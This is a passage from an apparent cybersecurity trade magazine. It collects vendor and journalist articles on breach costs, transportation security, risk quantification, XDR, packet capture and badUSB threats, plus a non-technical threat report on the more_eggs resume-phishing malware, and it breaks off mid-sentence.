responsibility for technical strategy in EMC's entire product portfolio including Storage,
Backup/Recovery/Archiving, Information Lifecycle Management and Security. Hector G worked closely
with EMC's Office of Technology, which is responsible for defining the company's evolving technology
vision and technology strategy, as well as working with the industry on standards.
Since 2004 Hector G. has been a licensed Private Investigator, focusing on investigation and forensics
with government, academia, and the private sector. Other areas of focus have been in executive and
dignitary protection, serving with a Louisiana Parish Police Department, certified as a practicing Personal
Protection Specialist (P.P.S) from the Executive Protection Institute in Berryville, Virginia. Assignments
have been from single focus to multi-jurisdictional task forces focusing on advance work and perimeter
protection. Hector G is PCI-QSA certified and an ISO 27001 Lead Implementer & Auditor. Hector G. has
an MBA from CUNY, Zicklin School of Business and is an alum of Harvard Business School.
Héctor G. Martínez can be reached online at hector.g.martinez@gmsectec.com or at our company
website http://www.gmesectec.com
How Much Is Your Data Actually Worth?
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group
As our world gets smaller, and our systems for sharing information become increasingly interconnected,
breaches are becoming an inevitability. It’s no longer a matter of if, but when, your data will come under
attack. But do you have any idea how precious your data actually is?
The criminals who steal data, whether for the purpose of blackmail, identity theft, extortion or even
espionage, are finding themselves competing in an increasingly crowded marketplace. Over the course
of the global coronavirus pandemic, as the lines between our personal and professional lives and devices
blurred like never before and ransomware proliferated, hackers became more active and empowered
than ever.
According to Privacy Affairs’ latest Dark Web Price Index, the stolen data market grew significantly larger
in both volume and variety over the last year, with more credit card data, personal information and
documents on offer.
As the supply of stolen data has grown, prices for each individual piece of data have plummeted. Hacked
credit card details that would have sold for US$240 in 2021 are going for US$120 in 2022, for instance,
and stolen online banking logins are down from US$120 to US$65.
But this hasn’t discouraged cybercriminals. Instead, dark web sites have begun resorting to traditional
marketing tactics like two-for-one discounts on stolen data, creating a bulk sales mentality that places an
even greater imperative on cybercrime cartels to amass large quantities of data.
This makes it even more likely that your data will be stolen, because even if your organisation isn’t
specifically targeted, you could be caught up in an increasingly common smash-and-grab raid like the
attack on Microsoft that exposed around a quarter of a million email systems last year.
And while the value of each piece of data on the dark web is decreasing for cybercriminals, cyber attacks
are just getting costlier for the businesses the data is stolen from.
How much is your data worth to your business?
Not sure how much your data is worth? The exact answer is impossible to quantify definitively, as it will
change from one business and one piece of data to another, but it’s clear that having your data stolen
can have devastating consequences.
According to the Cost of a Data Breach Report 2021 from IBM and Ponemon, which studied the impacts
of 537 real breaches across 17 countries and regions, the per-record cost to a business of a data breach
sits at US$161 per record on average, a 10.3 per cent increase from 2020 to 2021.
For a personally identifiable piece of customer data, the cost goes up to US$180 per record. Not only is
this the costliest type of record, it’s also the most commonly compromised, appearing in 44 per cent of
all breaches in the study.
For a personally identifiable piece of employee data, the cost sits at US$176 per record. Intellectual
property costs US$169 per record, while anonymised customer data will set you back US$157 per record.
But it’s extremely unlikely that a cybercriminal would go to the effort of hacking your business for one
piece of data. In that sense, it’s more instructive to look at the average cost of a data breach in total,
which currently sits at a staggering US$4.24M.
For ransomware breaches, in which cybercriminals encrypt files on a device and demand a ransom in
exchange for their decryption, the average cost goes up to US$4.62M, while data breaches caused by
business email compromise have an average cost of US$5.01M.
Breaches are costliest in the heavily regulated healthcare industry (US$9.23M), a logical outcome given
the heightened sensitivity of medical records. By comparison, the ‘cheapest’ breaches are in less
regulated industries such as hospitality (US$3.03M).
Mega breaches involving at least 50 million records were excluded from the study to avoid blowing up
the average, but a separate section of the report noted that these types of attacks cost 100 times more
than the average breach.
The report found the average breach takes 287 days to identify and contain, with the cost increasing the
longer the breach remains unidentified. So when it comes to cybercrime, time really is money.
IBM and Ponemon broke the average cost of a breach up into four broad categories: detection and
escalation (29 per cent), notification (6 per cent), post-breach response (27 per cent) and lost business
cost (38 per cent). Lost business costs include business disruption and revenue losses from system
downtime; the cost of lost customers; reputation losses; and diminished goodwill.
A 2019 Deloitte report determined that up to 90 per cent of the total costs in a cyberattack occur beneath
the surface: the disruption to a business’ operations, as well as insurance premium increases, credit
rating impact, loss of customer relationships and brand devaluation, are the real killers in the long run.
It can take time for the true impacts of a breach to reveal themselves. In 2021, the National Australia
Bank revealed it had paid $686,878 in compensation to customers as the result of a 2019 data breach,
which led to the personal account details of about 13,000 customers being uploaded to the dark web.
The costs included the reissuance of government identification documents, as well as subscriptions to
independent, enhanced fraud detection services for the affected customers. But the bank also had to hire
a team of cyber-intelligence experts to investigate the breach, the cost of which remains unknown.
The IBM and Ponemon report confirms that the costs of a data breach won’t all be felt straight away.
While the bulk of an average data breach’s cost (53 per cent) is incurred in the first year, another 31 per
cent is incurred in the second year, and the final 16 per cent is incurred more than two years after the
event.
And with the recent rise of double extortion (in which cyber criminals not only take control of a system
and demand payment for its return, but also threaten to leak the data they’ve stolen unless they receive
a separate payment), we’re likely to see data breaches exact a heavy toll for even longer time periods
moving forward.
How can you protect your data?
Data breaches are becoming costlier and more common, so it’s more important than ever to ensure your
data is protected.
Many businesses are turning to cyber insurance to protect themselves. Cyber insurance typically covers
costs related to the loss of data, as well as fines and penalties imposed by regulators, public relations
costs, and compensation to third parties for failure to protect their data.
But as breaches become a virtual inevitability and claims for catastrophic cyberattacks become more
common, insurers are getting cold feet. Premiums are skyrocketing, and insurers are limiting their
coverage, with some capping their coverage at about half of what they used to offer and others refusing
to offer cyber insurance policies altogether.
Regardless, cyber insurance is not a cyber security policy. Even the most favourable cyber insurance
policy doesn’t prevent breaches, but merely attempts to mitigate the impact after the horse has already
bolted.
The best approach is to educate your employees and other members of your organisation about cyber
security, and put the appropriate controls and best practices in place, including using multi-factor
authentication, implementing zero trust policies, and backing up and encrypting data.
The IBM and Ponemon report found that the use of strong encryption (at least AES-256, at rest and in
transit) was a top mitigating cost factor. Organisations using strong encryption had an average breach
cost that was 29.4 per cent lower than those using low-standard or no encryption.
When data is safely and securely encrypted, any files a cybercriminal gains access to will be worthless
to them without an encryption key. My business, Cryptoloc, has taken this principle even further with our
patented three-key encryption technology, which combines three different encryption algorithms into one
unique multilayer process.
Built for a world without perimeters, our ISO-certified technology has been deployed across multiple
products, including Cryptoloc Secure2Client, which enables users to send fully encrypted documents
directly from Microsoft Outlook.
We’ve recently made Secure2Client available on the Salesforce AppExchange, so that marketing, sales,
commerce, service and IT teams using Salesforce around the world can encrypt the reports they send to
clients and third parties that are sensitive or confidential in nature.
This protects Salesforce users from the potentially catastrophic ramifications of a data breach, while
allowing them to continue using the existing application that their business is built around.
We’ve also rolled out a new Ransomware Recovery capability that empowers users to protect and restore
their data in real-time in the event of an attack, ensuring they never have to pay a costly ransom for the
return of their data.
With Ransomware Recovery, every version of every file a user stores in the Cloud is automatically saved.
If they suspect they’ve been the victim of a ransomware attack, they can simply lock down their Cloud
temporarily to stop the spread of malware; view their files’ audit trails to determine when the attack
occurred; roll back their data to the point before it was corrupted; and then unlock their Cloud.
This ensures users can recover their data as quickly and effectively as possible, minimising costly
disruptions to their business, removing the need for a lengthy and expensive investigation, and ensuring
they never have to pay a cent to a cybercriminal to get back the data that’s rightfully theirs.
Yes, cyber attacks are inevitable, but victimhood isn’t. If you take the right precautions, you can prevent
costly breaches and maintain control of your precious data.
About the Author
Jamie Wilson is the founder and chairman of Cryptoloc,
recognized by Forbes as one of the 20 Best Cybersecurity
Startups to watch in 2020. Headquartered in Brisbane,
Australia, with offices in Japan, US, South Africa and the
UK, Cryptoloc has developed one of the world’s strongest
encryption technologies and cybersecurity platforms,
ensuring clients have complete control over their data.
Jamie can be reached online at
www.linkedin.com/in/jamie-wilson-07424a68 and at
www.cryptoloc.com
Airports, Bridges, and Beltways
Cyber and Physical Transportation in the Transportation Industry
By Alan Cunningham, Journalist, Truth Be Told
Like most other areas of business, government, public safety/service, and society, the transportation
system of the U.S. faces a wealth of challenges and threats. For clarity, the transportation sector
encompasses “a category of companies that provide services to move people or goods, as well as
transportation infrastructure…[consisting] of several industries including air freight and logistics, airlines,
marine, road and rail, and transportation infrastructure while being further broken down into the sub-
industries air freight and logistics, airlines, marine, railroads, trucking, airport services, highways and
rail tracks, and marine ports and services”.
From natural disasters to supply chain issues, trucking and transportation allow the United States to
function; without the ability to gain food, water, or other essential supplies, the society of a given county,
state, region, or even potentially the nation could crumble and be unable to function.
The most glaring of these threats to the transportation industry comes from cyberspace, with foreign
intelligence services, terrorist groups, and individual hackers being able to potentially, "[collect] private
financial, personal and health information of their employees, as well as account numbers and other
protected information of clients...[render Electronic Logging Devices] inoperable by a virus, ransomware
or other hacking event [resulting in lost revenue and people being unable to get to their destination]",
hack into a company's computer systems to cause a companywide failure resulting in delays, spoilt
perishables, or a shutdown of all computer systems followed by a demand for money (a very real threat
to any company). The failures of these systems would result in very serious problems for the
transportation industry and, being that truckers are the backbone of the vast majority of businesses in
the United States, the halting of their systems would be incredibly detrimental to the overall conduct of
business in the country.
From a cybersecurity standpoint, there are naturally the basic suggestions that better training, more aware
employees, and routine security checks are imperative; however, these apply from a company
standpoint. The U.S. Department of Transportation (DoT) can adequately help in these matters too, by
providing better security systems for vehicles to prevent vehicle hackings, holding joint private
industry-business/government discussions on cyber threats and security, and improving the
communications systems of vehicles so they are not open to attack. The Department of Homeland
Security too can and must provide training and advice to the private sector, in that transportation not only
includes land, but also sea and air travel, which, if corrupted, would severely incapacitate Americans’
ability to travel and the import and export of essential goods and services.
Cyber is not the only large challenge to the transportation industry either. It is well-documented that the
physical standing of America’s infrastructure is not the most secured or well-developed, with the
American Society of Civil Engineers estimating that, "the US needs to spend some $4.5 trillion by 2025
to improve the state of the country's roads, bridges, dams, airports, schools, and more," while
emphasizing that congestion at airports and sea ports is a serious problem and results in delays and
transportation problems, that roughly 32.6 percent of bridges are over fifty years old and in need of
repair, that many of the railway projects in the U.S. are, "backlogged [by] 111 years", that 46 percent of
both urban and rural roads, "are in poor condition", that public transit is severely underfunded and in need
of billions of dollars, and finally that many ships navigating the inland waterways have trouble doing so
due to dams and locks becoming old and rusted.
Clearly, there was a need for a massive funding of public works and infrastructure projects which would
absolutely help the land, sea, and air transportation systems grow and become larger than they once
were. This was answered in the aftermath of the 2020 U.S. presidential election in which Biden worked
to get passed in Congress a bipartisan infrastructure bill which has the overall goal of “[rebuilding]
America’s roads, bridges and rails, expand access to clean drinking water, ensure every American has
access to high-speed internet, tackle the climate crisis, advance environmental justice, and invest in
communities that have too often been left behind…[in addition to easing] inflationary pressures and
strengthen supply chains by making long overdue improvements for our nation’s ports, airports, rail, and
roads”. According to CNBC News, once the $1 trillion bill was passed in November of 2021, the law
provides “$110 billion into roads, bridges and other major projects. It will invest $66 billion in freight and
passenger rail, including potential upgrades to Amtrak [and directs] $39 billion into public transit systems”.
However, there are still many issues with this bipartisan bill. One is that a great majority of Americans
still live in rural, more country areas which makes gaining necessary supplies difficult and burdensome
in addition to gaining access to strong broadband capabilities. A complete overhaul of the transportation
sector, ensuring it is protected physically and in cyberspace, is highly important to ensuring Americans
have access to essential supplies, as well as ensuring that all Americans will be able to have access to
their goods and transport their goods abroad in a timely fashion. All of these should be challenges the next
presidential administration (and the one after) should seriously focus on.
In regards to the national highway system, I would disagree that it is the most resilient and robust CIKR.
A 2017 article from Forbes details how places like Chicago and San Francisco, locations with high urban
density and traffic, are at a higher risk and are more susceptible to poor and crumbling infrastructure. It
is very apparent that the national highway system of the U.S. is in dire need of additional assistance
(going beyond the bipartisan bill, a variety of other solutions that would benefit the environment and the
economy overall) and I would hesitate to call the roads and highways of the United States a robust or
resilient system. While this may have been true throughout the mid to late 20th century, in the past twenty
years, upkeep of America's roadways has severely declined.
Nonetheless, this is changing rapidly. Just recently, in March of 2022, the Biden administration and the
DoT’s Federal Transit Administration… “awarded $409.3 million in grants to 70 projects in 39 states to
modernize and electrify America’s buses, make bus systems and routes more reliable, and improve their
safety”. These grants and economic supplements support modernizing and improving the most
widespread form of transit in America and will help dozens of communities buy new-technology and
electric buses that reduce or eliminate greenhouse gas emissions, promote
cleaner air, and help address the climate crisis, this being in addition to the millions already received in
the bill. Biden also has advanced the Trucking Action Plan which aims to “[build] supply chain resilience
through better quality trucking jobs…[and increase] federal funding to expedite issuance of commercial
driver's licenses, expanded outreach efforts to veterans through the Department of Veterans Affairs, and
established a joint initiative between the Departments of Labor and Transportation to expand recruitment
and advocate for employees”.
The Biden administration is working hard on these issues, yet it still seems to neglect the cyberspace
aspect of programs, focusing largely on economic measures and efficiency rather than defending against
cyberattacks and network intrusion, with the closest item being supply chain resilience. A stronger
emphasis on improving the transportation system’s cyber responses is a necessity given how at risk the
sector is to problems.
About the Author
Alan Cunningham is a Journalist with multiple national security and
human rights organizations including Truth Be Told, ReaperFeed, and
the foreign policy think tank Quo Vademus. He has been published in
various other publications including The Diplomat, Modern Diplomacy,
Security Magazine, the National Institute of Military Justice, The Crime
Report of the John Jay College of Criminal Justice, and the Jurist of the
University of Pittsburgh School of Law. He is a graduate of Norwich
University and the University of Texas at Austin and hopes to gain a PhD
in History from the University of Birmingham and a JD from St. Mary’s
School of Law. He is a sexual assault advocate and volunteers his time
to Combat Sexual Assault. He can be reached on Twitter at
@CadetCunningham.
Businesses Will Suffer Cyber-Attacks; But
Do They Know the Real Cost?
By Reuven Aronashvili, Founder & Chief Executive Officer at CYE
In 2021 the number of ransomware attacks doubled, the number of supply chain attacks tripled and
threats from state-backed hackers continue to rise. While sectors like finance and healthcare suffered
more than others, attacks are up across the board and everyone is vulnerable.
It is now basically inevitable that most organizations will experience some type of cyberattack. That
means that there must be a shift in attitude from pure prevention, which is no longer realistic, to fully
understanding a company’s exposure to cyber risk and understanding the tools needed for smarter
planning and comprehensive decision-making capabilities.
Putting risk exposure (the cost and likelihood of a potential breach) into dollar terms is more important
than ever for organizations. This is the only way that companies will be able to protect themselves in the
long run and strengthen themselves as they shift the cybersecurity of their organization from a cost-
center to a business differentiator and even market advantage. So how exactly can organizations do
this?
Think Holistically
While the CISO is in charge of security, this is no longer the realm of the CISO alone. Security is a
valuable business asset (and risk), and the entire C-suite needs to be involved, including having CISOs
sit on management boards. Cybersecurity is increasingly affecting productivity and daily operations in
every sector, with attacks or breaches potentially stopping or interrupting operations for hours or days.
When cyberattacks interrupt business, as seen in cases like the shutdown of the Colonial pipeline last
year, they demand action far beyond technical mitigation. Such situations call for public relations, change
in business operations, legal actions and more. Responding to attacks involves all departments, and so
should planning for attacks and defining security strategy. Rather than being seen as in charge of
security, today’s CISOs should be seen as an essential bridge between the business and technical
concerns, leading a collaborative effort to protect the organization.
Embrace automatic tools to quantify risk and exposure
In order to have a truly holistic approach to cybersecurity, everyone, including non-technically-minded
executives, needs to understand the risk and possible solutions. This means that the risk and the
company’s exposure to potential threats need to be translated into and explained in dollar terms. A proper
risk exposure calculation will take into account each asset, the likelihood of it being attacked and the
consequences of such an attack. This way companies can effectively invest in the proper solutions, and
decide what is worth protecting, and at what cost.
Automation, data and AI play a growing and important role in calculating exposure. The internet is full of
cyber risk calculators, and many security companies provide them as well. But most are missing key
components and fail to give a breakdown of direct costs, like the price of an in-house IR team, and indirect
costs, like fines or crisis communications following breaches. Most also fail to take into account factors
like the cost of closing a business or part of a business due to an attack.
That’s why we at CYE provide a SaaS solution that maps out attack routes and correlates technical
vulnerabilities with business insights, optimizing the reduction of cyber exposure through scientific
analysis of the organizational risk profile. This allows the system to assign a dollar amount to each
possible breach and to point to exactly where mitigations are needed. These assessments are unique to
each company and based on an algorithm using the most relevant and up-to-date data. It is not a
simulation; it delivers a real-life picture of the risk scenario and its bottom-line effect on the business
through advanced algorithms and graph modeling, combined with highly experienced red teams with
national-level experience. This goes along with our company’s general approach of helping users
understand their security posture within the bigger business picture.
Look for targeted security solutions, and don’t forget about the human factor
CISOs often get distracted by all the cybersecurity solutions, especially as new ones chasing the latest
vulnerabilities are constantly released. This has led to a situation of over-differentiation in the sector, with
many solutions solving very specific issues. Companies should not only look for more holistic solutions
and platforms that address several issues together, but should make sure the solutions reduce their
actual risk exposure, rather than just aim to solve the latest or trendiest type of general threat.
When implementing solutions, the human team is equally important. Organizations should make sure
that the security team knows how to properly execute the tools to get the biggest benefits out of them.
Companies should also understand the actors behind the most likely threats, and respond accordingly
with specific and qualified cyber talent. This is especially important when it comes to preventing attacks
by state-backed actors.
Cybersecurity challenges, and solutions, will only proliferate as the world grows more digital. But the key
is matching the solutions to the threats, and deciding which threats require the most immediate solutions
and mitigation, while also accounting for the human factor.
About the Author
Reuven Aronashvili, Founder & Chief Executive Officer at CYE.
Reuven is a serial cybersecurity entrepreneur and a national
cybersecurity expert. Reuven is an ex-Matzov and a founding
member of the Israeli army’s Red Team (Section 21) and Incident
Response Team. His expertise is in designing and developing
innovative security solutions for governments and multinational
organizations around the globe, as well as conducting high-profile
security improvement programs. Reuven serves as a trusted
advisor for executives in leading Fortune 500 companies and is
certified by the US Department of Homeland Security as a world
class ICS and SCADA cybersecurity expert. Reuven completed
his Master’s degree in Computer Science from Tel-Aviv
University, as part of an excellence program during his military
service.
www.cyesec.com
aiXDR Brief
By Randy Blasik, V.P. of Technology Solutions, Seceon Inc.
Introduction.
aiXDR, with its novel approach focusing on detecting and stopping threats in all vectors automatically
before data is compromised, has redefined the role of today’s Cyber Security Analysts. The solution, with
Managed Service Security Provider (MSSP) “multi-tier multi-tenant” capabilities, has finally made it
operationally profitable for MSSPs to offer customers of any size and ability advanced threat detection
and remediation services. It solves today’s most vexing problem: how to make threat analysis and
remediation a task that takes minutes to perform, with minimally trained staff, when an incident arises.
Seceon’s aiXDR provides visibility, detection, prioritization, and response capability for unparalleled
security and operational efficiency and accuracy. It helps organizations overcome: (1) The pitfalls of
siloed EDR solutions, (2) difficult integration with other tools (SIEM, IDS, DLP, etc.), (3) lack of deep
security analytics to automate core processes, (4) failure to integrate data from key sources (such as,
DNS logs, NetFlows, Vulnerability Assessment Scanners, Active Directory, etc.), and (5) partial threat
coverage with limited visibility into the detection and response. Seceon is an All-In-One experience that
is organically and seamlessly fused together.
Not all XDR solutions are equal.
The XDR market is full of vendors offering their XDR solutions. However, not all XDR solutions offer the
same protection. Many of these solutions do not provide the full visibility required in today’s more complex
networks. They may lack, for instance, NetFlow information or adaptive self-learning models to auto-tune
noise, and they sometimes restrict the number of feeds that they can ingest.
Seceon provides full 360° coverage of the Threat Landscape by including:
“Anything that gives less coverage is exposing the client to a potential breach and exposing your business
to additional liabilities. Please ensure that any solution you evaluate has the same coverage as the
Seceon solution.”
- Randy Blasik, V.P. Technology Solutions, Seceon
Automation & Visibility are the Key.
Endpoint Detection & Response (EDR) is migrating to becoming Extended Detection & Response (XDR).
This is because the gap between what is known and what is unknown, in the form of a threat, is growing.
The number of devices and the activity generating vast volumes of data have become unmanageable,
and the data ingestion volume has become impossible for traditional security tools. The result is that
there is a need to automate as much as possible. This automation needs to be extremely accurate and
intelligence-driven, leading to reduced false positives and true actionable responses. Data needs to be
gathered from all the devices in the network landscape.
Having collated all this data, it needs to be presented in a way that shows not only what is happening live
but also what happened in the past. You need to be able to benchmark the activity of a device and user
to check whether an event is “out of character” for that device or user, or whether it has been seen before and is not
a threat (for example, a regular test that should be marked as benign).
Having everything on one platform, with multi-tier/multi-tenancy capability, automating events from all
devices and presenting these results in a way that enables the Analyst to make informed decisions is
what we at Seceon have been providing to our clients since we decided to build the platform. Having one
integrated platform considerably reduces costs compared to solutions that are assembled from bolt-on
components. Seceon and its Advanced Threat Detection and Remediation Platform (aiXDR) is the
industry’s most comprehensive platform for extended detection and response (xDR).
About the Author
Randy Blasik is the V.P. of Technology Solutions at Seceon Inc.
He is a veteran of more than 20 years in the fields of technology
development, technology support and cyber security. Prior to
Seceon, Randy spent the last 7 years as Chief
Technology Officer of a firm where he played a key role in building the
business into a nationally recognized Managed Services Provider.
Randy has also held key technology-focused roles in small, mid and
large market firms dating back to the year 2000. At Seceon Randy
provides seasoned leadership, oversees Technology Solutions and is
using his wide range of experience to drive both internal and external
successes.
Randy can be reached online at Email,
https://www.linkedin.com/in/randy-blasik-7a0183149/ and at our
company website https://www.seceon.com/leadership/
Why Aren’t More Companies Capitalizing on
Packet Capture?
By Cary Wright, VP of Product Management, Endace
In a threat landscape that is now changing more rapidly than ever before, why aren’t more companies
capitalizing on the benefits of packet capture? Well, historically, packet analysis has been a manual
function with very real accessibility issues. It’s not unheard of for security teams to struggle to pull several
weeks' worth of packets, running searches for hours or days across massive files to find the evidence
they are looking for. Unsurprisingly, this type of packet handling has also been costly.
Packet capture has also mainly been used by senior security analysts with deep experience in packet
forensics -- a specific skill that's in short supply, and not something more junior analysts know how to do,
despite its necessity in today’s threat landscape.
How do you do packet capture well, so that everyone (not just experienced, senior packet analysts) can
quickly find the data they need, get to relevant packets from alerts in their relevant tools, and extract
value from that full packet data?
As renowned SANS Institute course instructor Jake Williams likes to say, “today’s packet capture is not
your Grandma’s packet capture.” Indeed, packet capture has truly moved to the next level, and security-
savvy companies are deploying distributed, centrally managed recording appliances that are designed to
be modular and highly scalable to deliver the storage capacity, performance and rapid search that is
needed while accelerating investigation and response time.
Access the actual content of a network conversation - easily
The forensic evidence gained from packet capture is a vital resource for incident response teams, helping
to accurately reconstruct cyberattacks so analysts can understand exactly what happened and what the
full impact is. Forensic evidence can provide a detailed breakdown of how far an attacker penetrated,
how they managed to get around existing defenses, and what data and systems were attacked and
potentially compromised. Without this knowledge, SecOps teams can have a hard time understanding
how to respond to and resolve incidents.
Some security teams rely on piecing together evidence from log files -- system logs, application logs,
authentication logs etc. -- combined with network metadata, threat intelligence and alerts from their
security monitoring tools. The problem with this is that it doesn’t provide the actual payload information
that enables teams to accurately reconstruct what took place to see exactly what files were transferred,
what data was extracted, and what systems were impacted. Log files and metadata provide a snapshot
summary of events which is useful for building a picture of activity. But relying solely on these sources
and not having access to packet data means teams can risk missing critical evidence when it really
matters.
The alternative is to record full packet data, which lets analysts inspect historical traffic to investigate
threats more closely. This provides access to the actual content such as files, malware, ransomware,
executables, zip archives, exfiltrated documents, code downloads and more: anything attackers can
use to compromise user and network security and steal data.
Analysts can also re-analyze recorded packet data to generate detailed logs on-demand - including DNS,
HTTPS, TLS, SMTP, database transactions, and more - or analyze recorded traffic using new rules to
detect network threats that might have been missed the first time and provide deeper contextual insight
into attack activity.
Accelerating investigation and response
The experience that many teams had in the past with packet capture is that it can be challenging to
accurately record and manage large volumes of data at high-speed -- and time-consuming to locate the
specific data that is needed for an investigation. Packet analysis has traditionally required deep expertise
too.
Modern packet capture solutions are designed to be modular and scalable. They can cost-effectively
record weeks to months of history at today's fastest network speeds (10 Gbps up to 100 Gbps or more),
giving security teams plenty of time to go back and investigate historical events.
Analysts can search/data-mine recorded data to find and analyze relevant packets quickly from within
what may be petabytes of data. Integration with a wide variety of cybersecurity solutions makes it possible
to "pivot" in-context from an alert in a security or performance monitoring tool directly to the relevant
packets. This speeds up and streamlines the investigation process and can also enable common
evidence collection and analysis tasks to be automated (e.g. using SOAR tools).
This also makes it easy to extract useful information from packet data -- such as reassembled files or
detailed analysis logs -- without having to be an experienced senior analyst with deep packet analysis
expertise. The same can be done on historical data, so you can go back in time to analyze past
events.
Analysts can review days, weeks or months of recorded packet history easily and quickly for incident
response, threat-hunting or troubleshooting network or application performance issues. Networks can
also be set up as a fabric of multiple capture points, capable of being searched from a single pane of
glass.
With these improvements and more, the next generation of packet capture is set to become the gold
standard for understanding the threats traversing networks, and troubleshooting IT operational or
performance issues.
About the Author
Cary Wright, VP Product Management at Endace, has more than 25
years’ experience in creating market-defining networking, cybersecurity
and application delivery products at companies including Agilent, HP, Ixia
and NEC. www.endace.com
What Makes A USB Bad - And How Should
Organizations Resolve This Risk?
When ransomware can attack organizations via USB drives and cables, best practice backup
and security becomes even more critical
By Jon Fielding, Managing Director, EMEA Apricorn
Earlier this year, the FBI uncovered that a cybercrime group had been mailing out USB sticks in the hope
that recipients would plug them into their PCs which would then install ransomware on their networks.
UK businesses should be taking note of the trend for cyber criminals to adopt such strategies - which,
more often than not, can prove effective and even damaging for organizations.
In particular, ransomware attacks resulted in record financial payouts to criminals in 2021, just to
ensure business continuity. The 2022 Unit 42 Ransomware Threat Report found that the average
ransomware payment rose 78% last year to $541,010 (£414,193). Ransom demands soared by 144% to
reach an eye-watering average of $2.2m (£1.7m).
Criminals will try any and every avenue to get inside access to an organisation either physically or
virtually. Ransomware-by-thumb-drive is just a new avenue that builds on the old badUSB exploit, dating
back to 2006 - when an auto-run vulnerability was discovered that automatically executed malicious
payloads when an 'infected' device was loaded.
If a USB stick with corrupted firmware can be sent to the right people in a spear phishing attempt,
alongside messaging or other communication of a convincing story that means the drive in question gets
used, criminals can easily gain a point of unfettered access to a network. The same attack, leveraging
badUSB, can now be delivered through a simple USB cable which, to the naked eye, looks like any other
cable.
How to spot and mitigate a bad USB in 2022
Unfortunately, because badUSB threats are Trojan-horsed inside simple human interface devices, they can
be almost impossible to detect unless picked up by constant monitoring of the specific endpoint. Unknown
USB devices cannot be trusted - yet Apricorn's survey reveals that trust is often misplaced. This means
that organisations increasingly need to ensure mitigation is already in place at all times.
Typically, this must be achieved without resorting to a blanket ban on USB-enabled devices, which are
ubiquitous and frequently vital today when it comes to moving and storing data, especially in a hybrid
working environment where some work from home, and others in the office.
The good news is, mitigations can be easily and affordably achieved by mandating the use of corporate-
standard USB devices with high-level encryption and firmware implemented in a way that makes it
impossible to modify for this exploit - right across the entire organisation.
The policy can then be enforced by locking down USB ports on employee machines to ensure they can
only accept an approved USB device.
Of course, such a policy will also cover off the need for a solid 3-2-1 backup strategy, which requires a secure
offline, off-site backup of all critical data along with a further copy on another medium or in the cloud, for
disaster recovery should the worst happen regardless.
Over half of the US and UK organisations we polled in late 2021 revealed that they had lost data due to
inadequate backup procedures.
Even government departments can fall prey to such oversight - luckily, our own investigation revealed
that many also encrypted their data - another key to threat mitigation overall. All data should be encrypted,
whether in transit or in storage, to ensure that even if information falls into the wrong hands, it cannot be
accessed.
Modern software-free, 256-bit AES XTS hardware-encrypted USB drives can therefore play a critical role
in covering off many critical security and privacy requirements, while maintaining fast, convenient access
for approved users at all times, wherever they are working.
Backed up by workforce-wide education - including at management level - about the threat, covering
the risks associated with using unsanctioned USBs as well as the role employees must play in countering
such threats, these measures operate as a strong, effective defence in most circumstances, as part of a multi-layered
security strategy.
About the Author
Jon Fielding, Managing Director, EMEA Apricorn. Jon is responsible for
Apricorn’s EMEA sales and operations strategy, driving revenue growth
and establishing its channel network. CISSP-certified, he’s been
focused on information security for 23 years, working with organisations
ranging from IBM to start-ups including Valicert, Tumbleweed and
Ironkey. In his last three roles, Jon has been first in region and tasked
with establishing the company in EMEA. He has specialised in data
encryption and storage for the last 10 years. Jon can be reached online
at Jon Fielding | LinkedIn and at our company website
www.apricorn.com
eSentire Discovers Hackers Spearphishing
Hiring Managers with Resumes Poisoned
with More_Eggs Malware
By Keegan Keplinger, Research and Reporting Lead, Threat Response Unit, eSentire
In March, eSentire’s security research team, the Threat Response Unit (TRU), discovered that the stealthy
more_eggs malware had re-emerged after being silent for nearly a year. More_eggs was being used in
a phishing campaign where hackers were posing as job applicants and luring corporate hiring managers
into downloading what they believed were resumes from potential candidates. However, the bogus
documents contained the more_eggs malware.
More_eggs is malicious software that contains several components, including one that is engineered to
steal valuable credentials, including usernames and passwords for corporate bank accounts, email
accounts and IT administrator accounts. If a threat actor can obtain IT administration credentials for a
company, they can easily exfiltrate data from the victim, spread their malware to other computer hosts
within the organization’s network, via Microsoft TeamViewer, and encrypt a company’s files.
The Golden Chickens group (aka Venom Spider) is believed to be the threat operators behind
more_eggs. Thus far this year, TRU has discovered and shut down four separate security incidents
relating to more_eggs. The organizations attacked include a U.S.-based aerospace/defense company; a
large UK-based CPA firm; an international business law firm based out of Canada; and a national
Canadian staffing agency.
The 2022 More_Eggs Operation: a Déjà Vu of the 2021 LinkedIn More_Eggs Campaign?
Ironically, an eerily similar more_eggs campaign was uncovered by eSentire’s TRU in March 2021.
However, during that campaign, rather than posing as hopeful job candidates sending poisoned resumes,
the threat actors targeted professionals on LinkedIn seeking employment. They sent the job seekers .zip
files disguised as job offers. When the targets opened the zip file, it led to the installation of more_eggs.
The hackers tried enticing the targets into clicking on the zip file by naming it after the job seeker’s current
job title and adding “position” at the end.
For example, if the LinkedIn member’s job was listed as ‘Senior Account Executive—International
Freight,’ the malicious zip file would be titled ‘Senior Account Executive — International Freight position.’
TRU Disrupts More_Eggs Attacks Hitting an Aerospace/Defense Company, International Law
Firm, International CPA Firm and National Staffing Agency
When TRU discovered and shut down the four more_eggs incidents this year, each incident involved a
new variant of more_eggs.
TRU believes that the threat actors behind the 2022 more_eggs campaign are not randomly targeting
companies. For example, the CPA firm and the staffing agency both listed job postings on Indeed.com
and LinkedIn that matched the title of the resume each hiring manager received. The aerospace/defense
company also had a job listed on ZipRecruiter.com that matched the title of the fake resume it received.
The Inner Workings of More_Eggs
More_eggs is a sophisticated suite of malware components. One of those components is VenomLNK (a
component used to trick the victim into installing TerraLoader). TerraLoader is an intermediate
component used to install numerous modules designed to take malicious actions such as credential theft,
lateral movement, and file encryption throughout a victim’s IT network. Here is a full breakdown:
VenomLNK is a poisoned LNK file. Windows uses LNK files to automate program execution. More_eggs uses a maliciously written LNK file to execute TerraLoader by tricking the user into opening what they think is a document.
TerraLoader loads the other modules from VenomLNK.
TerraPreter provides a Meterpreter (a Metasploit attack payload) shell in memory.
TerraStealer is an info-stealing module used to exfiltrate sensitive data.
TerraTV allows threat actors to hijack TeamViewer for lateral movement.
TerraCrypt is a ransomware plugin for PureLocker ransomware, aka CR1 Ransomware, a lesser-known ransomware.
The social engineering method for the 2022 more_eggs campaign consisted of disguising a zipped copy
of the VenomLNK malware as a job applicant’s resume. A benign PDF resume was included as well,
which served as a decoy resume, while more_eggs installed TerraLoader.
As with previous more_eggs variants observed by TRU, the malware abuses legitimate Windows
processes to evade detection, alongside a decoy document to trick users. In the incident involving the
